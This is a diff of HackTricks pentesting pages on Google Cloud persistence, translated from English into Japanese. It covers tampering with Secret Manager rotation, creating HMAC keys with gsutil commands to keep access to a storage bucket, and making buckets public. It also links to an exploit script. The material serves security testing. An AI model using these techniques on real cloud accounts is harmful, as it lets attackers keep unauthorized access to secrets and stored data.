- [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2)
{{#include ../../../banners/hacktricks-training.md}}

18
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md
View File

@@ -4,23 +4,19 @@
## Secret Manager
Find more information about Secret Manager in:
Secret Managerに関する詳細情報は以下を参照してください
{{#ref}}
../gcp-services/gcp-secrets-manager-enum.md
{{#endref}}
### Rotation misuse
### 回転の悪用
An attacker could update the secret to:
攻撃者は秘密を更新して以下を行うことができます:
- **Stop rotations** so the secret won't be modified
- **Make rotations much less often** so the secret won't be modified
- **Publish the rotation message to a different pub/sub**
- **Modify the rotation code being executed.** This happens in a different service, probably in a Cloud Function, so the attacker will need privileged access over the Cloud Function or any other service.
- **回転を停止**して秘密が変更されないようにする
- **回転を非常に少なくする**ことで秘密が変更されないようにする
- **回転メッセージを別のpub/subに公開する**
- **実行される回転コードを変更する。** これは別のサービス、恐らくCloud Functionで発生するため、攻撃者はCloud Functionまたは他のサービスに対する特権アクセスが必要です。
{{#include ../../../banners/hacktricks-training.md}}

20
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md
View File

@@ -1,10 +1,10 @@
# GCP - Storage Persistence
# GCP - ストレージの永続性
{{#include ../../../banners/hacktricks-training.md}}
## Storage
## ストレージ
For more information about Cloud Storage check:
Cloud Storageに関する詳細情報は以下を確認してください
{{#ref}}
../gcp-services/gcp-storage-enum.md
@@ -12,8 +12,7 @@ For more information about Cloud Storage check:
### `storage.hmacKeys.create`
You can create an HMAC to maintain persistence over a bucket. For more information about this technique [**check it here**](../gcp-privilege-escalation/gcp-storage-privesc.md#storage.hmackeys.create).
バケット上で永続性を維持するためにHMACを作成できます。この技術に関する詳細は[**こちらを確認してください**](../gcp-privilege-escalation/gcp-storage-privesc.md#storage.hmackeys.create)
```bash
# Create key
gsutil hmac create <sa-email>
@@ -24,19 +23,14 @@ gsutil config -a
# Use it
gsutil ls gs://[BUCKET_NAME]
```
別のこの方法のエクスプロイトスクリプトは[こちら](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py)で見つけることができます。
Another exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py).
### 公開アクセスを与える
### Give Public Access
**Making a bucket publicly accessible** is another way to maintain access over the bucket. Check how to do it in:
**バケットを公開可能にする**ことは、バケットへのアクセスを維持する別の方法です。方法については以下を確認してください:
{{#ref}}
../gcp-post-exploitation/gcp-storage-post-exploitation.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}